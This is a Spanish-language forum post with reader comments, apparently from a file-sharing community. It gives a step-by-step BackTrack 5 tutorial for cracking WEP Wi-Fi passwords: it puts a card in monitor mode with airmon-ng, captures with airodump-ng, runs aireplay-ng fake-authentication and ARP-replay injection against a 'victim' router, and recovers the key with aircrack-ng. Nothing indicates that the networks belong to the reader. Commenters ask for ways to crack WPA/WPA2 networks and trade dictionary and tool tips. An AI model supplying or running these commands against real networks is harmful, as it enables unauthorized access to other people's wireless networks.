Hackear contraseñas wep con BackTrack 5

TUTORIAL BACKTRACK MUY FACIL

Bueno ante todo este es mi primer post y mi primer tutorial el cual realice en base a experiencia propia investigando aquí y alla, espero les guste y sepan comprender si encuentran algún error.
ARRANQUEMOS
(1) Habren una consola esto esta al lado del menu donde aparece una ventanita
(2) En la consola teclean: ifconfig que es para saber cual es la interfaz de su tarjeta, puede ser eth0, wlan0 etc.

(3) Teclean airmon-ng start wlan0 (Esto es para poner en modo monitor) donde wlan0 depende de la interfaz de su tarjeta inalambrica

(4) abrimos otra consola y Escribimos airodump-ng mon0 (Esto es para ver las redes que estan a nuestro alcance)

(5) Seleccionamos una red que sea WEP y que tenga mas datas posibles para que se demore menos ,Apretamos Ctrl+C para detener el proceso de busqueda  y dejar libre nuestra placa de red copiamos la BSSID, el CH y el ESSID.
(6) abrimos otra consola y tecleamos airodump-ng -c 11 -w nombre --bssid 00:11:22:33:44:55 mon0
(-c CH(canal que copiamos del paso anterior) -w ESSID(que copiamos del paso anterior ?) --bssid BSSID(que tambien copiamos del paso anterior )

--COMO INYECTAR TRAFICO PARA ACELERAR EL PROCESO UNA VEZ QUE COMIENZA A CAPTURAR PAQUETES --
--Para acelerar este proceso ya que es muy lento o simplemente no manda DATA necesitamos abrir otra consola dejando las anteriores abiertas . y ahi escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h 00:11:22:33:44:55(mac tuya) -e ejemplo(bssid de la red que auditamos ? osea el nombre) mon0(tu interfaz de red) esto es para asociarnos a la red

--en este momento deberias empezar a recibir DATA mas rapido .. pero en algunos casos demora
mas poque no hay trafico de red ... luego se este paso podemos acelerar aun mas el proceso
inyectandole trafico a el router con el siguente comando : aireplay-ng -3 -b 66:77:88:99:00:11(mac victima) -h 00:11:22:33:44:55( tu mac) wlan0
(tu interfaz de red) con eso deberia ir muy rapido recibiendo data

(7) Esperamos que capture unos 5.000 y probamos si no funciona a los 10.000, 15.000 y si no a los 20.000
(8) Lo ultimo para crackear abrimos otra consola y ponemos aircrack-ng essid-01.cap
essid es el nombre que le pusieron en el paso anterior al -w
y esperamos...

la contraseña es la que sale donde dice key found: 00:11:22:33:44:55 (dfbks)
y la contraseña quedaria asi: 001122334455 o bien dfbks cualquiera de las dos es valida
El tiempo del proceso de captura de datos varia de acuerdo al uso y capacidades que tenga la red en ese momento puede llegar a tardar 24 horas ? como 5 o 10 minutos ?
ESPERO LES SIRVA Y LES HALLA GUSTADO ESTE MINI TUTORIAL
Es lo mas básico y fácil que lo pude hacer para que no se compliquen mucho sobre todo los que no están familiarizados con las consolas (línea de comandos) en Linux las imágenes están puestas a modo ilustrativo sigan el texto para la correcta ejecución de los comandos.
Gracias por leer y tener paciencia

14 Puntos Score: 4.7/10
Visitas: 9505 Favoritos: 12
Ver los usuarios que votaron...
Más del Autor...
No se encontraron más posts
20 Comentarios Hackear contraseñas wep con BackTrack 5
bienvenido a identi   backtrack es una excelente distro ahora mismo la esoy usando y me va muy bien   +7
Pues yo uso BEINI y en 2 minutos me da las claves perobusco uno que sirva para claves wap2 y wpa-psk alguien sabe de alguno???
gracias por la bienvenida, por el comentario y por los puntos chemical_12 y si es excelente backtrack, un abrazo

por el momento no vick777 pero va a ser tema de uno de mis proximos post en cuanto lo tenga lo publico  
Es un buen programa y te inyecta muchos paquetes. Por el momento uso el Beini, en el cual no tecleo ning?
gracias @nandott, en la linea de comandos tenes un mayor control de lo que hace y queres que haga el programa, en modo grafico es muy automatizado el proceso. Me gusta tener el control Je je. un abrazo
la verdad igual se agradece el aporte pero creo que todos buscas un metododo que sea sencillo y pratico para sacar claves wpa la opcion creo yo que alguien mejore beini ya que no hay mas vesrsiones y ya no van salir mas la opcios es que alguien que sea informatco de los buenos lo modifique y asi poder sacar claves wpa por el momento soloq ueda conformarse con claves wep se agradece el aporte
@cardbook @esmelida  muchas gracias a los dos
Cita VICK777: Mostrar
pues sin tanto rollo en el backtrack con el gerix te funciona para wep y para wpa y en el beini solo que tengas unos buenos diccionarios con eso la armas
Cita chucho05: Mostrar
Ya me descrague varios diccionarios pero no me funcionaron con el beini unos solo juntaban unos cuantos paquetes de datos y salia error ahora busco el backtrack grax x la info  
Cita VICK777: Mostrar
si checa con el gerix wificrakcker esta en las herramientas de explotation tools. Oye no sabes como hacer un usb multiboot con los dos con el beini y el backtrack
y tu cuando subes tu diicionario de 40 gb todvia te espero issuezo para que lo subas igual se agradece los aportes lo otro el diccionaro que tinene para programa es  beini wirlax o bastrak con view
muy bueno..!  
Muy buen aporteeee ;D
@radikaledward @joelfer2 @issue2b @chucho05 @issue2b @VICK777 Gracias a todos por visitar y comentar el post
!!
buena informacion  

haber si subes algo para wpa2

[/b]amigo que extra?
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!